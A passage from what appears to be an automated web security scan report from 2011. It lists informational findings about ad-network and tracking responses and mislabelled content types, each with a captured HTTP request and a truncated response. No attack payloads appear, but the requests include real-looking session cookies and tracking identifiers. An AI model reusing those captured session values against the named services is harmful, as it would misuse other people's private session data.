Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Tue, 06 Sep 2011 12:55:24 GMT
Expires: Tue, 06 Sep 2011 12:55:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

24.20. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=77 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 06-Sep-2011 12:44:36 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 572

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://tags.bluekai.com/site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID
...[SNIP]...

24.21. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Tue, 06 Sep 2011 13:00:24 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:44:59 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

24.23. https://us.etrade.com/e/t/jumppage/viewjumppage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...

24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /MDS/iview/346808775/direct/01

Request

GET /MDS/iview/346808775/direct/01?time=1315313105.703304&click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTY2aDhvcChnaWQkY29weF9XS0lQRTdwQVJwalRsLndqUUo4TWhkN2FrNW1GZEVBQ0xfeixzdCQxMzE1MzEzMTA1Njg2MTQ1LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJEtfejVZa1BEbUxBLSxjdCQyNSx5YngkaEpadGh3bG42Nzlna3FRMnIwNW02USxyJDAscmQkMTZpcnQybjg0KSk/1/*http://global.ard.yahoo.com/SIG=15j6kmdf5/M=999999.999999.999999.999999/D=sports/S=25664825:NT1/_ylt=ApiYATlqiMuuKIbliWocrTQ5nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=K_z5YkPDmLA-/J=1315313105703304/K=r8awXcUkJHjbbi3QZybcoQ/A=3672360466282920027/R=0/X=6/* HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:08 GMT
Connection: close
Content-Length: 983

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/233570462/346808775/direct/01" onclick="(new Image).src='http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTY2aDhv
...[SNIP]...

24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:15 GMT
Connection: close
Content-Length: 9420

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...

24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ULA/iview/351127232/direct/01

Request

GET /ULA/iview/351127232/direct/01?time=0.6476867063902318&click=http://global.ard.yahoo.com/SIG=15ofquilq/M=801389.14847586.14590575.8842099/D=movies/S=7820639:LREC/_ylt=ArDkTjjTVQQGSE3cO1ppKBlfVXcA/Y=YAHOO/EXP=1315320297/L=6231TkWTWyDpARpjTl.wjQVUMhd7ak5mFckABi.p/B=xJy5EGKJiRw-/J=1315313097544579/K=3q_Pgfb1tF9EF5Bt89NjSg/A=6481381/R=0/* HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:00 GMT
Connection: close
Content-Length: 8264

<html><head><title>300x250_BTBS_Dante_Yh1k</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...

24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:38 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...

24.28. http://www.comcast.com/2go/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /2go/

Request

GET /2go/ HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331749|PC#1315327839174-766376.19#1316539489|check#true#1315329949; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 01 Sep 2011 11:41:23 GMT
Accept-Ranges: bytes
ETag: "7f4d7139c68cc1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:52 GMT
Connection: close
Content-Length: 109

<html>
<head>
<meta http-equiv="refresh" content="0;url=default.ashx" />
</head>
<body>
</body>
</html>

24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /.element/ssi/ads/2.0/gdyn_pgatour.html

Request

GET /.element/ssi/ads/2.0/gdyn_pgatour.html HTTP/1.1
Host: www.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:26 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Tue, 06 Sep 2011 12:50:41 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...

24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /tools/domesticratecalc/welcome.htm

Request

GET /tools/domesticratecalc/welcome.htm?from=zclresults&page=ratecalc HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: http://zip4.usps.com/zip4/zcl_1_results.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331579861:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 494
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:05 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<!-- Send users to the new location. -->
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://postcalc.usps.gov/">
<META N
...[SNIP]...

24.31. http://www.vonage.com/googlesearch/get_results.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/get_results.php

Request

POST /googlesearch/get_results.php?mode=cluster&coutput=xml&client=external_test&q=xss&lang_cntry=en_us&refer=/ HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
Content-Length: 0
Origin: http://www.vonage.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_cm=telephone%20serviceGooglewww.google.com; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744; MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_nr=1315328340141-New; gpv_pageName=index_login; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.3.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 65
Content-Type: text/html

<?xml version="1.0"?>
<toplevel>
<t_fetch int="19"/>
</toplevel>

24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive9.com
Path:   /2140/Visitor/vTracker_v2.asp

Request

GET /2140/Visitor/vTracker_v2.asp?websiteid=344&groupid=2140 HTTP/1.1
Host: www.websitealive9.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 8029
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...

25. Content type incorrectly stated
There are 59 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
